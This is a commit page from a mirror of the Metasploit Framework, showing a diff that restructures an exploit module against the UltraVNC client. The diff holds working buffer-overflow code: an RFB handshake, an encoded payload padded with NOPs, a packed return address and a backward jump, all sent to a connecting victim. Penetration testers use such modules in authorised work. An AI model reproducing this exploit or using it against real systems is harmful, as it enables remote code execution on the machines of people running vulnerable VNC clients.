infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

module clean up for ultravnc_client.rb 

git-svn-id: file:///home/svn/framework3/trunk@4204 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Mario Ceballos 2006-12-14 22:39:58 +00:00
parent cfdd264f2d
commit 529b808fc9
1 changed files with 9 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

17
modules/exploits/windows/vnc/ultravnc_client.rb
View File

@ -48,19 +48,20 @@ class Exploits::Windows::Vnc::Ultravnc_Client < Exploit::Remote
end end
def on_client_connect(client) def on_client_connect(client)
return if ((p = regenerate_payload(client)) == nil)
filler = make_nops(980 - payload.encoded.length)
rfb = "RFB 003.006\n" rfb = "RFB 003.006\n"
sploit = "\x00\x00\x00\x00\x00\x00\x04\x06" + "Requires Ultr@VNC Authentication\n"
sploit << payload.encoded + filler + [target.ret].pack('V')
sploit << "PASSWORD" + [0xe8, -997].pack('CV')
client.put(rfb) client.put(rfb)
end
on_client_data(16) def on_client_data(client)
return if ((p = regenerate_payload(client)) == nil)
filler = make_nops(980 - payload.encoded.length)
sploit = "\x00\x00\x00\x00\x00\x00\x04\x06" + "Requires Ultr@VNC Authentication\n"
sploit << payload.encoded + filler + [target.ret].pack('V')
sploit << "PASSWORD" + [0xe8, -997].pack('CV')
print_status("Sending #{sploit.length} bytes to #{client.getpeername}:#{client.peerport}...") print_status("Sending #{sploit.length} bytes to #{client.getpeername}:#{client.peerport}...")
client.put(sploit) client.put(sploit)